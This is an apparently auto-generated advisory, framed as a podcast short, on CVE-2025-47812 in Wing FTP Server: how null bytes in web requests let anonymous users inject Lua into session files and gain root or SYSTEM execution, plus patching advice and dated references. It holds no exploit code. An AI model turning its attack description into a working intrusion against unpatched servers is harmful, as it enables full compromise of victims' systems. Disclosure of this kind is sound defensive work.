Wing FTP Server: remote code execution via null byte injection in Wing FTP Server (CVE-2025-47812) #shorts

Summary

Today on the Cyber Spotlight Podcast, we’re diving into CVE-2025-47812, a critical remote code execution flaw in Wing FTP Server. Published on July 10, 2025 and patched in version 7.4.4, this vulnerability allows unauthenticated attackers – even anonymous FTP users – to inject arbitrary Lua code and execute system commands with root or SYSTEM privileges. Active exploitation has already been confirmed in the wild, making immediate patching essential for all affected installations.

Product details

Wing FTP Server is a popular cross-platform FTP, FTPS, SFTP and HTTP(S) file transfer solution used by businesses, government agencies, and service providers. It supports web-based user and admin interfaces written in Lua. Versions prior to 7.4.4 contain the vulnerability; once patched, the product addresses null-byte mishandling in both admin and user session components.

Vulnerability type summary

CVE-2025-47812 is classified under CWE-158: Improper Neutralization of Null Byte or NUL Character. By failing to sanitize '\0' characters in web requests, the application allows attackers to manipulate session files and inject arbitrary Lua scripting logic, resulting in remote code execution at the operating system level.

Details of the vulnerability

In versions before 7.4.4, both the user and admin web interfaces accept input containing null bytes without proper validation. An attacker crafts a request containing '\0' sequences that break out of intended data fields and append malicious Lua code to session files. When Wing FTP Server processes those session files, it executes the injected code with full FTP-service privileges—root on Linux or SYSTEM on Windows. Since anonymous FTP accounts can also trigger this behavior, no valid credentials are required. Huntress and other researchers have observed active exploitation targeting corporate and public servers.

Conclusion

CVE-2025-47812 represents a severe threat: full server compromise via a simple null-byte injection. Administrators must upgrade Wing FTP Server to version 7.4.4 or later without delay, verify no unpatched instances remain exposed to the internet, and review logs for suspicious activity around July 2025. Regular patch management and monitoring remain your best defenses against rapidly exploited RCE vulnerabilities.

This chain involves the following actors

• Attacker: Malicious actor exploiting the null-byte handling flaw
• Wing FTP Server Administrator: Responsible for deploying patches and securing the server

This following systems are involved

• Wing FTP Server (File transfer and management): Target application where session files are created and parsed
• Operating System (Host environment for Wing FTP Server): Execution context for arbitrary commands

Attack entry point

• Anonymous FTP Interface: Allows unauthenticated file uploads that trigger session handling
• Web Administration Interface: Accepts user parameters that can include null byte sequences

Remediation actions

Exploitation actions

• https://www.wftpserver.com
• https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
• [2025-06-30] Discussion about a remote code execution vulnerability in Wing FTP Server (CVE-2025-47812).
• [2025-07-10] A critical vulnerability in Wing FTP Server up to 7.4.3 allows for remote code execution.
• [2025-07-11] Active exploitation of a critical RCE vulnerability in Wing FTP Server, CVE-2025-47812, confirmed by Huntress.
• [2025-07-11] Threat actors are actively exploiting a recently fixed remote code execution vulnerability (CVE-2025-47812) in Wing FTP Server.
• [2025-07-11] A critical vulnerability in Wing FTP Server (CVE-2025-47812) is being exploited in the wild.